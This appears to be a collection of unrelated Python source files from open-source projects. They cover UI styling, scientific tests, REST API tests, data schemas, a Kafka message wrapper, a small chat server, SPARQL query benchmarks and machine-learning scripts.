from prompt_toolkit.styles import Style from prompt_toolkit.utils import is_windows def load_style(): """ Return a dict mapping {ui_style_name -> style_dict}. """ if is_windows(): return Style.from_dict(win32_code_style) else: return Style.from_dict(default_ui_style) default_ui_style = { "output-field": "bg:#171E2B #1CD085", # noqa: E241 "input-field": "bg:#000000 #FFFFFF", # noqa: E241 "log-field": "bg:#171E2B #FFFFFF", # noqa: E241 "title": "bg:#000000 #AAAAAA", # noqa: E241 "search": "bg:#000000 #93C36D", # noqa: E241 "search.current": "bg:#000000 #1CD085", # noqa: E241 "primary": "#1CD085", # noqa: E241 "warning": "#93C36D", # noqa: E241 "error": "#F5634A", # noqa: E241 } # Style for an older version of Windows consoles. They support only 16 colors, # so we choose a combination that displays nicely. win32_code_style = { "output-field": "#ansigreen", # noqa: E241 "input-field": "#ansiwhite", # noqa: E241 "log-field": "#ansiwhite", # noqa: E241 "search": "#ansigreen", # noqa: E241 "search.current": "#ansigreen", # noqa: E241 "primary": "#ansigreen", # noqa: E241 "warning": "#ansibrightyellow", # noqa: E241 "error": "#ansired", # noqa: E241 }
439787
import numpy as np import lcc.stars_processing.deciders.supervised_deciders as dec from lcc.stars_processing.deciders.neuron_decider import NeuronDecider def set_up(): deciders = [dec.AdaBoostDec(), dec.ExtraTreesDec(), dec.GaussianNBDec(), dec.LDADec(), dec.QDADec(), dec.RandomForestDec(), dec.SVCDec(), dec.TreeDec(), NeuronDecider(hidden_neurons=10, maxEpochs=500)] return np.random.random_sample((100, 7)), np.random.random_sample((100, 7)) + 1, deciders def test(): search_sample1, others_sample1, deciders = set_up() eee = {} for dec in deciders: dec.learn(search_sample1, others_sample1) p1 = dec.evaluate(search_sample1) p2 = dec.evaluate(others_sample1) eee[dec.__class__.__name__] = np.mean(p1) - np.mean(p2) assert np.mean(p1) - np.mean(p2) > 0.95
439809
from kaldo.forceconstants import ForceConstants from kaldo.phonons import Phonons from kaldo.conductivity import Conductivity import matplotlib.pyplot as plt import ase.io """ Unit and regression test for the kaldo package. """ # Import package, test suite, and other packages as needed from kaldo.forceconstants import ForceConstants import numpy as np from kaldo.phonons import Phonons from kaldo.conductivity import Conductivity import pytest @pytest.yield_fixture(scope="function") def phonons(): print ("Preparing phonons object.") forceconstants = ForceConstants.from_folder(folder='kaldo/tests/si-amorphous', format='eskm') phonons = Phonons(forceconstants=forceconstants, is_classic=False, temperature=300, third_bandwidth=1 / 4.135, broadening_shape='triangle', storage='memory') return phonons def test_af_conductivity_without_antiresonant(phonons): cond = Conductivity(phonons=phonons, method='qhgk', storage='memory') cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes)) cond = (cond.conductivity.sum(axis=0).diagonal().mean()) np.testing.assert_approx_equal(cond, 0.804, significant=3) def test_af_conductivity_with_antiresonant(phonons): cond = Conductivity(phonons=phonons, method='qhgk', storage='memory') cond.is_diffusivity_including_antiresonant = True cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes)) cond = (cond.conductivity.sum(axis=0).diagonal().mean()) np.testing.assert_approx_equal(cond, 0.825, significant=3) def test_af_conductivity_without_antiresonant_gauss(phonons): cond = Conductivity(phonons=phonons, method='qhgk', storage='memory') cond.diffusivity_shape = 'gauss' cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes)) cond = (cond.conductivity.sum(axis=0).diagonal().mean()) np.testing.assert_approx_equal(cond, 0.8305, significant=3) def test_af_conductivity_with_antiresonant_gauss(phonons): cond = Conductivity(phonons=phonons, method='qhgk', storage='memory') cond.diffusivity_shape = 'gauss' cond.is_diffusivity_including_antiresonant = True cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes)) cond = (cond.conductivity.sum(axis=0).diagonal().mean()) np.testing.assert_approx_equal(cond, 0.8335, significant=3)
439843
import logging from logging import NullHandler from .exceptions import InvalidSWAGDataException logging.getLogger(__name__).addHandler(NullHandler())
439850
import matplotlib.pyplot as plt from wbml.plot import tweak from stheno import B, Measure, GP, EQ # Define points to predict at. x = B.linspace(0, 10, 100) with Measure() as prior: f1 = GP(3, EQ()) f2 = GP(3, EQ()) # Compute the approximate product. f_prod = f1 * f2 # Sample two functions. s1, s2 = prior.sample(f1(x), f2(x)) # Predict. f_prod_post = f_prod | ((f1(x), s1), (f2(x), s2)) mean, lower, upper = f_prod_post(x).marginal_credible_bounds() # Plot result. plt.plot(x, s1, label="Sample 1", style="train") plt.plot(x, s2, label="Sample 2", style="train", ls="--") plt.plot(x, s1 * s2, label="True product", style="test") plt.plot(x, mean, label="Approximate posterior", style="pred") plt.fill_between(x, lower, upper, style="pred") tweak() plt.savefig("readme_example9_product.png") plt.show()
439862
import json from datetime import datetime import requests from django.test import TestCase from rest_framework import status class TestDataReadWrite(TestCase): def setUp(self): self.writeUrl = "https://zuri.chat/data/write" self.plugin_id = "123" self.org_id = "123" self.playlist = { "name": "Slow mode", "genre": "pop and soul", "date_created": datetime.now(), "songs": {}, "comments": {}, "likes": 0, "created_by": "classicmeone", } self.comment = { "comment": "Very good bad songs", "date_created": datetime.now(), } self.song = { "title": "Pimp Down", "artist": "Drake", "album": "CLB", "released": datetime.now(), } def test_WritePlaylist(self): data = { "plugin_id": self.plugin_id, "organization_id": self.org_id, "collection_name": "Playlists", "bulk_write": False, "object_id": "001", "filter": {}, "payload": self.playlist, } res = requests.post(self.writeUrl, data=data) self.assertEqual(res.status_code, status.HTTP_200_OK) def test_WriteComment(self): data = { "plugin_id": self.plugin_id, "organization_id": self.org_id, "collection_name": "Comments", "bulk_write": False, "object_id": "001", "filter": {}, "payload": self.comment, } res = requests.post(self.writeUrl, data=data) self.assertEqual(res.status_code, status.HTTP_200_OK) def test_WriteSong(self): data = { "plugin_id": self.plugin_id, "organization_id": self.org_id, "collection_name": "Songs", "bulk_write": False, "object_id": "001", "filter": {}, "payload": self.song, } res = requests.post(self.writeUrl, data=data) self.assertEqual(res.status_code, status.HTTP_200_OK) def test_DataReadPlaylist(self): # /data/read/{plugin_id}/{collection_name}/{organization_id} url = "https://zuri.chat/data/read/123/Playlists/123" res = requests.get(url) self.assertEqual(res.status_code, status.HTTP_200_OK) # data = res.data[0] data = res.text vals = data[0] self.assertEqual(str(vals), "Slow mode") def test_DataReadComment(self): url = "https://zuri.chat/data/read/123/Comments/123" res = requests.get(url) self.assertEqual(res.status_code, status.HTTP_200_OK) data = res.text vals = data[0] self.assertEqual(str(vals), "Very good bad songs") def test_DataReadSong(self): url = "https://zuri.chat/data/read/123/Songs/123" res = requests.get(url) self.assertEqual(res.status_code, status.HTTP_200_OK) data = res.text vals = data[0] print(vals) self.assertEqual(str(vals), "Pimp Down")
439873
from textwrap import dedent from rest_framework.schemas.openapi import AutoSchema boilerplate = dedent("""\ Allows for logging into Tator as an anonymous user. """) class AnonymousGatewaySchema(AutoSchema): def get_operation(self, path, method): operation = super().get_operation(path, method) if method == 'GET': operation['operationId'] = 'GetAnonymousGatewaySchema' operation['tags'] = ['Tator'] return operation def get_description(self, path, method): return boilerplate def _get_filter_parameters(self, path, method): params = [] if method == 'GET': params = [{ 'name': 'redirect', 'in': 'query', 'required': False, 'description': 'URI to redirect to after logging in as anonymous user. ' 'Defaults to /projects.', 'schema': {'type': 'string'}, }] return params
439874
from util import next_software_num def test_next_software_num_for_non_existing_user_1(): expected = 1 actual = next_software_num(vm_id='does-not-exist-1') assert expected == actual def test_next_software_num_for_non_existing_user_2(): expected = 1 actual = next_software_num(vm_id='does-not-exist-2') assert expected == actual def test_next_sotware_num_for_existing_user_1(): expected = 2 actual = next_software_num(vm_id='scai-qrecc21-simple-baseline') assert expected == actual def test_next_sotware_num_for_existing_user_2(): expected = 6 actual = next_software_num(vm_id='test-user') print(actual) assert expected == actual
439884
from datetime import datetime from typing import Optional from pydantic import ConstrainedStr, HttpUrl from pydantic.types import NonNegativeInt from app.schemas.addresses import AddressResponse from app.schemas.base import BaseModel from app.schemas.organizations import OrganizationResponse class PostalCode(ConstrainedStr): min_length = 6 max_length = 6 class LocationResponseBase(BaseModel): name: str phone: Optional[str] notes: Optional[str] active: int postcode: Optional[str] url: Optional[HttpUrl] tags: Optional[str] external_key: Optional[str] class LocationResponse(LocationResponseBase): id: NonNegativeInt organization: Optional[int] address: Optional[int] created_at: datetime class LocationExpandedResponse(LocationResponseBase): id: NonNegativeInt organization: Optional[OrganizationResponse] address: Optional[AddressResponse] created_at: datetime class LocationCreateRequest(LocationResponseBase): organization: Optional[int] address: Optional[int] class LocationUpdateRequest(LocationResponseBase): id: NonNegativeInt address: Optional[int] organization: Optional[int] class LocationCreateRequestExpanded(LocationResponseBase): organization: Optional[int] line1: Optional[str] line2: Optional[str] city: Optional[str] province: str postcode: PostalCode
439890
from typing import Optional from confluent_kafka.cimpl import TIMESTAMP_NOT_AVAILABLE from confluent_kafka.cimpl import Message as ConfluentKafkaMessage from kafkian.serde.deserialization import Deserializer class Message: """ Message is an object (log record) consumed from Kafka. It provides read-only access to key, value, and message metadata: topic, partition, offset, and optionally timestamp and headers. Key and value and deserialized on first access. This class wraps cimpl.Message from confluent_kafka and not supposed to be user-instantiated. """ def __init__( self, message: ConfluentKafkaMessage, key_deserializer: Deserializer, value_deserializer: Deserializer ): self._message = message self._key_deserializer = key_deserializer self._value_deserializer = value_deserializer self._deserialized_key = None self._deserialized_value = None @property def key(self): """ :return: Deserialized message key """ if self._deserialized_key: return self._deserialized_key if self._message.key() is None: return None self._deserialized_key = self._key_deserializer.deserialize(self._message.key()) return self._deserialized_key @property def value(self): """ :return: Deserialized message value """ if self._deserialized_value: return self._deserialized_value if self._message.value() is None: return None self._deserialized_value = self._value_deserializer.deserialize(self._message.value()) return self._deserialized_value @property def topic(self) -> str: """ :return: Message topic """ return self._message.topic() @property def partition(self) -> int: """ :return: Message partition """ return self._message.partition() @property def offset(self) -> int: """ :return: Message offset """ return self._message.offset() @property def timestamp(self) -> Optional[int]: """ :return: Message timestamp, of None if not available. """ if not self._message.timestamp(): return None if self._message.timestamp()[0] == TIMESTAMP_NOT_AVAILABLE: return None return self._message.timestamp()[1] @property def timestamp_type(self) -> Optional[int]: """ :return: Message timestamp type - either message creation time or Log Append time, of None if not available. """ if not self._message.timestamp(): return None return self._message.timestamp()[0] @property def headers(self) -> list: """ :return: Message headers as list of two-tuples, one (key, value) pair for each header. :rtype: [(str, bytes),...] or None. """ return self._message.headers() or []
439914
def test_configuration_session(eos_conn): eos_conn.register_configuration_session(session_name="scrapli_test_session1") result = eos_conn.send_configs( configs=["interface ethernet 1", "show configuration sessions"], privilege_level="scrapli_test_session1", ) eos_conn.close() # pop the config session out eos_conn.privilege_levels.pop("scrapli_test_session1") assert "* scrapli_test_session" in result[1].result def test_configuration_session_abort(eos_conn): eos_conn.register_configuration_session(session_name="scrapli_test_session2") result = eos_conn.send_configs( configs=["tacocat", "show configuration sessions"], privilege_level="scrapli_test_session2", stop_on_failed=True, ) current_prompt = eos_conn.get_prompt() eos_conn.close() # pop the config session out eos_conn.privilege_levels.pop("scrapli_test_session2") # assert config session was aborted at first sign of failed config assert len(result) == 1 # assert that session aborted and we are back at priv exec assert current_prompt == "localhost#"
439925
from django.core.management import BaseCommand from django.db.models import Q from django.utils import timezone from data.constants import RACE_UNKNOWN_STRINGS from data.models import Victim, Complainant, Involvement, Officer class Command(BaseCommand): def handle(self, *args, **kwargs): now = timezone.now() for klass in [Victim, Complainant, Involvement, Officer]: query = Q() for race_string in RACE_UNKNOWN_STRINGS: query |= Q(race__iexact=race_string) klass.objects.filter(query).update(race='Unknown', updated_at=now)
439930
from ursinanetworking import * Server = UrsinaNetworkingServer("localhost", 25565) @Server.event def changeName(client, new_name): client.name = new_name Server.broadcast("messageReceveid", f"{client.name} joined the chat !") @Server.event def onClientDisconnected(client): Server.broadcast("messageReceveid", f"{client.name} left the chat !") @Server.event def message(client, message): Server.broadcast("messageReceveid", f"{client.name} : {message}") while True: Server.process_net_events()
439968
import argparse import os import csv import re import sys # default to importing from CorpusTools repo base = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) sys.path.insert(0,base) from corpustools.corpus.io import load_binary from corpustools.corpus.classes.lexicon import EnvironmentFilter from corpustools.phonosearch.phonosearch import phonological_search def main(): #### Parse command-line arguments parser = argparse.ArgumentParser(description = \ 'Phonological CorpusTools: phonological search CL interface') parser.add_argument('corpus_file_name', help='Name of corpus file') parser.add_argument('sequence', help=('Sequence to search for, with segment positions separated by commas,' +' and with sets separated by slashes.' +' E.g. the input i will return all words with the segment [i], while' +' the input a/o,t/p,i,n will return all words with [atin], [apin],' +' [otin], or [opin].')) parser.add_argument('-s', '--sequence_type', default='transcription', help="The attribute of Words to search within. Normally this will be the transcription, but it can also be the spelling or a user-specified tier.") parser.add_argument('-o', '--outfile', help='Name of output file') args = parser.parse_args() #### try: home = os.path.expanduser('~') corpus = load_binary(os.path.join(home, 'Documents', 'PCT', 'CorpusTools', 'CORPUS', args.corpus_file_name)) except FileNotFoundError: corpus = load_binary(args.corpus_file_name) split_sequence = [tuple(pos.split('/')) for pos in args.sequence.split(',')] middle = split_sequence[0] try: rhs = split_sequence[1:] except: rhs = None if len(rhs) == 0: rhs = None ef = EnvironmentFilter(middle, None, rhs) results = phonological_search(corpus, [ef], sequence_type=args.sequence_type) if args.outfile: with open(args.outfile, 'w') as outfile: for result in results: outfile.write(' '.join(getattr(result[0], args.sequence_type))+'\n') print('Search results written to output file.') else: print('No output file name provided.') print('Your search produced the results below:') for result in results: print('{}'.format(result[0])) print('Total number of results: {}'.format(str(len(results)))) print('Please specify an output file name with -o to save these results.') if __name__ == '__main__': main()
440044
from src.base_sample.core import Core from multiprocessing import freeze_support, cpu_count import argparse import logging if __name__ == '__main__': freeze_support() parser = argparse.ArgumentParser() parser.add_argument("-m", "--mic_amount", type=int, help="microphone amount") parser.add_argument("-p", "--proc_number", type=int, help="process number") parser.add_argument("-t", "--trials", type=int, help="trials number") parser.add_argument("-f", "--file", type=str, help="file name") parser.add_argument("-l", "--log_file", type=str, help="log file") args = parser.parse_args() if args.log_file: logging.basicConfig(format='%(levelname)s, PID: %(process)d, %(asctime)s:\t%(message)s', level=logging.INFO) else: logging.basicConfig(format='%(levelname)s, PID: %(process)d, %(asctime)s:\t%(message)s', filename=args.log_file, level=logging.INFO) if args.proc_number: if args.proc_number <= 0: raise ValueError('proc_number can''t bel less then zero.') cores_to_use = args.proc_number else: cores_to_use = cpu_count() core = Core(args.file, mic_amount=args.mic_amount, trials=args.trials, proc_number=cores_to_use) core.generate_source_positions() core.generate_distances() core.prepare() core.generate_signals() for trial_number in range(core.trials): logging.info('Trial number: %d', trial_number + 1) logging.info('Estimated X = %.15f, Estimated Y = %.15f, Estimated Z = %.15f', float(core.estimated_positions[trial_number][0]), float(core.estimated_positions[trial_number][1]), float(core.estimated_positions[trial_number][2])) logging.info('True X = %.15f, True Y = %.15f, True Z = %.15f', float(core.true_positions[trial_number][0]), float(core.true_positions[trial_number][1]), float(core.true_positions[trial_number][2])) core.draw_plot()
440048
import torchvision from torchvision import transforms from uvcgan.torch.select import extract_name_kwargs TRANSFORM_DICT = { 'center-crop' : transforms.CenterCrop, 'color-jitter' : transforms.ColorJitter, 'random-crop' : transforms.RandomCrop, 'random-flip-vertical' : transforms.RandomVerticalFlip, 'random-flip-horizontal' : transforms.RandomHorizontalFlip, 'random-rotation' : transforms.RandomRotation, 'resize' : transforms.Resize, 'CenterCrop' : transforms.CenterCrop, 'ColorJitter' : transforms.ColorJitter, 'RandomCrop' : transforms.RandomCrop, 'RandomVerticalFlip' : transforms.RandomVerticalFlip, 'RandomHorizontalFlip' : transforms.RandomHorizontalFlip, 'RandomRotation' : transforms.RandomRotation, 'Resize' : transforms.Resize, } def select_single_transform(transform): name, kwargs = extract_name_kwargs(transform) if name not in TRANSFORM_DICT: raise ValueError(f"Unknown transform: '{name}'") return TRANSFORM_DICT[name](**kwargs) def select_transform(transform): result = [] if transform is not None: if not isinstance(transform, (list, tuple)): transform = [ transform, ] result = [ select_single_transform(x) for x in transform ] result.append(torchvision.transforms.ToTensor()) return torchvision.transforms.Compose(result)
440051
from time import time from rdfframes.knowledge_graph import KnowledgeGraph from rdfframes.client.http_client import HttpClientDataFormat, HttpClient from rdfframes.client.sparql_endpoint_client import SPARQLEndpointClient from rdfframes.utils.constants import JoinType __author__ = "Ghadeer" endpoint = 'http://10.161.202.101:8890/sparql/' port = 8890 output_format = HttpClientDataFormat.PANDAS_DF max_rows = 1000000 timeout = 12000 """ client = HttpClient(endpoint_url=endpoint, port=port, return_format=output_format, timeout=timeout, max_rows=max_rows ) """ client = SPARQLEndpointClient(endpoint) graph = KnowledgeGraph(graph_name='dbpedia') def expand_groupby_join(join_type): basketball_palyer = graph.entities('dbpo:BasketballPlayer', entities_col_name='player')\ .expand('player', [('dbpp:team', 'team')])\ .group_by(['team']).count('player', 'count_basketball_players', True) basketball_team = graph.entities('dbpo:BasketballTeam', entities_col_name='team')\ .expand('team', [('dbpp:president', 'president'), ('dbpp:sponsor', 'sponsor'), ('dbpp:name', 'name')]) basketball_palyer_team = basketball_team.join(basketball_palyer,'team', join_type=join_type) print("SPARQL QUERY FOR JOIN TYPE {} \n{}\n".format(join_type, basketball_palyer_team.to_sparql())) #df = basketball_palyer_team.execute(client) #print(basketball_palyer_team.to_sparql()) #df = dataset.execute(client, return_format=output_format) #print(df.shape) def groupby_expand_join(join_type): basketball_palyer = graph.entities('dbpo:BasketballPlayer', entities_col_name='player')\ .expand('player', [('dbpp:team', 'team')])\ .group_by(['team']).count('player', 'count_basketball_players', True) basketball_team = graph.entities('dbpo:BasketballTeam', entities_col_name='team')\ .expand('team', [('dbpp:president', 'president'), ('dbpp:sponsor', 'sponsor'), ('dbpp:name', 'name')]) basketball_palyer_team = basketball_palyer.join(basketball_team,'team', join_type=join_type) print("SPARQL QUERY FOR JOIN TYPE {} \n{}\n".format(join_type, basketball_palyer_team.to_sparql())) def expand_join(join_type): basketball_palyer = graph.entities('dbpo:BasketballPlayer', entities_col_name='player')\ .expand('player', [('dbpp:nationality', 'nationality') ,('dbpp:birthPlace', 'place')\ ,('dbpp:birthDate','birthDate'),('dbpp:team', 'team')]) basketball_team = graph.entities('dbpo:BasketballTeam', entities_col_name='team')\ .expand('team', [('dbpp:president', 'president'), ('dbpp:sponsor', 'sponsor'), ('dbpp:name', 'name')]) basketball_palyer_team = basketball_team.join(basketball_palyer,'team', join_type=join_type) print(basketball_palyer_team.to_sparql()) #df = basketball_palyer_team.execute(client) def group_join(join_type): basket_ball = graph.entities('dbpo:BasketballPlayer', entities_col_name='player') \ .expand('player', [('dbpp:birthPlace', 'place')]) \ .group_by(['place']).count('player', 'count_basketball_players', True) tennis = graph.entities('dbpo:TennisPlayer', entities_col_name='player') \ .expand('player', [('dbpp:birthPlace', 'place')]) \ .group_by(['place']).count('player', 'count_tennis_players', True) teams = basket_ball.join(tennis, 'place', join_type=join_type) print(teams.to_sparql()) start = time() expand_groupby_join(JoinType.InnerJoin) duration = time()-start print("Duration of Inner join on expandable grouped datasets = {} sec".format(duration)) start = time() groupby_expand_join(JoinType.InnerJoin) duration = time()-start print("Duration of Inner join on grouped expandable datasets = {} sec".format(duration)) start = time() expand_groupby_join(JoinType.LeftOuterJoin) ## change the type here. duration = time()-start print("Duration of LeftOuter Join on expandable grouped datasets = {} sec".format(duration)) start = time() groupby_expand_join(JoinType.LeftOuterJoin) ## change the type here. duration = time()-start print("Duration of LeftOuter Join on grouped expandable datasets = {} sec".format(duration)) start = time() expand_groupby_join(JoinType.RightOuterJoin) ## change the type here. duration = time()-start print("Duration of RightOuter Join on expandable grouped datasets = {} sec".format(duration)) start = time() groupby_expand_join(JoinType.RightOuterJoin) ## change the type here. duration = time()-start print("Duration of RightOuter Join on grouped expandable datasets = {} sec".format(duration)) start = time() expand_groupby_join(JoinType.OuterJoin) ## change the type here. duration = time()-start print("Duration of Outer join on expandable grouped datasets = {} sec".format(duration)) start = time() groupby_expand_join(JoinType.OuterJoin) ## change the type here. duration = time()-start print("Duration of Outer join on grouped expandable datasets = {} sec".format(duration)) start = time() expand_join(JoinType.InnerJoin) ## change the type here. duration = time()-start print("Duration of Inner join on expandable datasets = {} sec".format(duration)) start = time() expand_join(JoinType.LeftOuterJoin) ## change the type here. duration = time()-start print("Duration of LeftOuter Join on expandable datasets = {} sec".format(duration)) start = time() expand_join(JoinType.RightOuterJoin) ## change the type here. duration = time()-start print("Duration ofRightOuter Join on expandable datasets = {} sec".format(duration)) start = time() expand_join(JoinType.OuterJoin) ## change the type here. duration = time()-start print("Duration of Outer join on expandable datasets = {} sec".format(duration)) start = time() group_join(JoinType.InnerJoin) ## change the type here. duration = time()-start print("Duration of Inner join on expandable datasets = {} sec".format(duration)) start = time() group_join(JoinType.LeftOuterJoin) ## change the type here. duration = time()-start print("Duration of LeftOuter Join on expandable datasets = {} sec".format(duration)) start = time() group_join(JoinType.RightOuterJoin) ## change the type here. duration = time()-start print("Duration ofRightOuter Join on expandable datasets = {} sec".format(duration)) start = time() group_join(JoinType.OuterJoin) ## change the type here. duration = time()-start print("Duration of Outer join on expandable datasets = {} sec".format(duration))
440055
from SDLInterface import SDLInterface import xml.etree.ElementTree as ElementTree class InterfaceParser: begin_tag = "<SDL_interface>" end_tag = "</SDL_interface>" def __init__(self, raw_string): self.interface = None begin_index = raw_string.find(InterfaceParser.begin_tag) end_index = raw_string.rfind(InterfaceParser.end_tag) if begin_index == -1 or end_index == -1 or end_index <= begin_index: return interface_string = raw_string[begin_index:end_index+len(InterfaceParser.end_tag)] self.interface = SDLInterface(ElementTree.fromstring(interface_string)) def has_interface(self): return self.interface is not None
440078
import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' # Create your first MLP in Keras from keras.models import Sequential from keras.layers import Dense from keras.models import model_from_json from keras.models import model_from_yaml from sklearn.model_selection import train_test_split from sklearn import metrics import numpy import pandas as pd df_train = pd.read_csv('num-train.csv') df_test = pd.read_csv('num-test.csv') test_actual = pd.read_csv('test.csv') uid = test_actual['UCIC_ID'] # # split into input (X) and output (y) variables # X = df_train.drop(['Responders'], axis = 1) # y = df_train.Responders.values # X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 1, test_size = 0.9) # # create model # model = Sequential() # model.add(Dense(400, input_dim=204, activation='relu')) # model.add(Dense(400, activation='relu')) # model.add(Dense(1, activation='sigmoid')) # # Compile model # model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) # # Fit the model # model.fit(X_train.values, y_train, epochs=10, batch_size=10) # # evaluate the model # scores = model.evaluate(X_test.values, y_test) # print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100)) # model.fit(X.values, y, epochs=10, batch_size=10) # try : # y_pred = model.predict(df_test.values) # print(type(y_pred)) # subm = pd.DataFrame({'UCIC_ID':uid.values, 'Responders':y_pred}) # subm.set_index('UCIC_ID', inplace = True) # subm.to_csv('mlp-keras-submission.csv') # except Exception as e: # print(e) # load json and create model json_file = open('model.json', 'r') loaded_model_json = json_file.read() json_file.close() loaded_model = model_from_json(loaded_model_json) # load weights into new model loaded_model.load_weights("model.h5") print("Loaded model from disk") # evaluate loaded model on test data loaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy']) predictions = loaded_model.predict(df_test.values) # round predictions rounded = [round(x[0]) for x in predictions] print(rounded) # # serialize model to JSON # model_json = model.to_json() # with open("model.json", "w") as json_file: # json_file.write(model_json) # # serialize weights to HDF5 # model.save_weights("model.h5") # print("Saved model to disk") # # serialize model to YAML # model_yaml = model.to_yaml() # with open("model.yaml", "w") as yaml_file: # yaml_file.write(model_yaml)
440081
from ocd_backend.transformers import BaseTransformer from ocd_backend.models import * class MotionItem(BaseTransformer): def transform(self): source_defaults = { 'source': 'partijgedrag', 'supplier': 'gegevensmagazijn', 'collection': 'motion', } motion = Motion(self.original_item['identifier'], **source_defaults) motion.name = self.original_item.get('titel') motion.text = self.original_item.get('tekst') motion.date = self.original_item.get('issuedate') motion.legislative_session = self.original_item['jaar'] motion.organization = Organization('TK', **source_defaults) if 'indieners' in self.original_item and len(self.original_item['indieners']) > 0: indiener_id, indiener_naam = self.original_item['indieners'][0] if not indiener_id: indiener_id = indiener_naam creator = Person(indiener_id, **source_defaults) creator.name = indiener_naam motion.creator = creator if 'indieners' in self.original_item and len(self.original_item['indieners']) > 1: motion.cocreator = list() for indiener_id, indiener_naam in self.original_item['indieners'][1:]: if not indiener_id: indiener_id = indiener_naam cocreator = Person(indiener_id, **source_defaults) cocreator.name = indiener_naam motion.cocreator.append(cocreator) vote_event = VoteEvent(self.original_item['identifier'], **source_defaults) vote_event.start_date = self.original_item.get('issuedate') if self.original_item['uitslag']: vote_event.result = ResultPassed elif not self.original_item['uitslag']: vote_event.result = ResultFailed if 'votes' in self.original_item: votes = list() for vote_option, vote_option_parties in self.original_item['votes'].items(): for vote_party in vote_option_parties: vote = Vote() if 'kamerlid' in vote_party: voter = Person(vote_party['kamerlid'], **source_defaults) voter.name = vote_party['kamerlid'] vote.voter = voter group = Organization(vote_party['partij'], **source_defaults) group.name = vote_party['partij'] vote.group = group vote.weight = vote_party['aantal'] if vote_option == 'voor': vote.option = VoteOptionYes elif vote_option == 'tegen': vote.option = VoteOptionNo elif vote_option == 'afwezig': vote.option = VoteOptionAbsent votes.append(vote) vote_event.votes = votes motion.vote_events = vote_event return motion
440100
import copy import numpy as np import torch from agent import CustomAgent from generic import to_pt class EnsembleAgent(CustomAgent): def get_ranks_greedy(self, obs, infos, input_quest, input_quest_mask, quest_id_list, previous_commands, previous_dynamics, previous_belief): with torch.no_grad(): batch_size = len(obs) # update inputs for answerer if self.not_finished_yet is None: self.not_finished_yet = np.ones((len(obs),), dtype="float32") self.naozi.push_batch(copy.deepcopy(obs)) self.kg.push_batch(copy.deepcopy(obs), previous_commands, [item["srl"] for item in infos]) else: for i in range(batch_size): if self.not_finished_yet[i] == 1.0: self.naozi.push_one(i, copy.deepcopy(obs[i])) self.kg.push_one(i, copy.deepcopy(obs[i]), previous_commands[i], infos[i]["srl"]) description_list = self.naozi.get() input_description, input_description_mask, description_id_list = self.get_agent_inputs(description_list) ctrlf_word_mask, _ = self.get_word_mask(quest_id_list, description_id_list) current_belief = [None] * batch_size if self.enable_graph_input == "gata": current_adjacency_matrix, current_belief, previous_adjacency_matrix = self.graph_update_during_rl(input_description, input_description_mask, previous_belief) for i in range(batch_size): if self.not_finished_yet[i] == 0.0: current_adjacency_matrix[i] = previous_adjacency_matrix[i] current_belief[i] = previous_belief[i] node_representations, node_mask = self.encode_belief_graph(current_adjacency_matrix, use_model="online") node_vocabulary, relation_vocabulary, graph_triplets = [None] * batch_size, [None] * batch_size, [None] * batch_size elif self.enable_graph_input != "false": graph_triplets, node_vocabulary, relation_vocabulary, graph_adj_np = self.kg.get() graph_adj = to_pt(graph_adj_np, enable_cuda=self.use_cuda, type="float") node_features, node_mask, relation_features, relation_mask = self.get_gcn_input_features(node_vocabulary, relation_vocabulary, use_model="online") node_representations = self.get_graph_representations(node_features, node_mask, relation_features, relation_mask, graph_adj, use_model="online") # batch x max_n_node x hid else: graph_triplets, node_vocabulary, relation_vocabulary = [None] * batch_size, [None] * batch_size, [None] * batch_size node_representations, node_mask, relation_mask = None, None, None action_rank, ctrlf_rank, current_dynamics = self.get_ranks(input_description, input_description_mask, input_quest, input_quest_mask, ctrlf_word_mask, node_representations, node_mask, node_vocabulary, previous_dynamics, use_model="online") # list of batch x vocab # info for replay memory for i in range(batch_size): if self.prev_actions[-1][i] == "stop": self.prev_step_is_still_interacting[i] = 0.0 # previous step is still interacting, this is because DQN requires one step extra computation replay_info = [to_pt(self.prev_step_is_still_interacting, False, "float")] return action_rank, ctrlf_rank, ctrlf_word_mask, current_dynamics, current_belief, replay_info def get_qa_ranks_greedy(self, observation_list, quest_list, belief): with torch.no_grad(): batch_size = len(observation_list) current_belief = None if self.enable_graph_input == "gata": current_belief = belief graph_adj, node_vocabulary, relation_vocabulary = None, [None] * batch_size, [None] * batch_size elif self.enable_graph_input != "false": _, node_vocabulary, relation_vocabulary, graph_adj_np = self.kg.get() graph_adj = to_pt(graph_adj_np, enable_cuda=self.use_cuda, type="float") else: graph_adj, node_vocabulary, relation_vocabulary = None, [None] * batch_size, [None] * batch_size point_rank, mask = self.answer_question(observation_list, quest_list, node_vocabulary, relation_vocabulary, graph_adj, current_belief) # batch x time x 2 return point_rank, mask
440112
import os, sys, time, ipdb, argparse, cv2, scipy, skimage, glob import torch import torch.optim from torch.autograd import Variable import torch.nn as nn from torchvision import models import torch.nn.functional as F import torchvision.transforms as transforms # from torch.utils.data import Dataset, TensorDataset from srblib import abs_path import numpy as np import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.colors import ListedColormap from PIL import ImageFilter, Image # from robustness import model_utils, datasets from user_constants import DATA_PATH_DICT import settings import warnings warnings.filterwarnings("ignore") import utils as eutils use_cuda = torch.cuda.is_available() FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor LongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor Tensor = FloatTensor # os.environ.set("MAX_LEN_IDENTIFIER", 300) text_file = abs_path(settings.paper_img_txt_file) # text_file = f'/home/naman/CS231n/heatmap_tests/' \ # f'Madri/Madri_New/robustness_applications/img_name_files/' \ # f'time_15669152608009198_seed_0_' \ # f'common_correct_imgs_model_names_madry_ressnet50_googlenet.txt' img_name_list = [] with open(text_file, 'r') as f: for line in f: img_name_list.append(line.split('\n')[0]) ## For reproducebility torch.manual_seed(0) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False 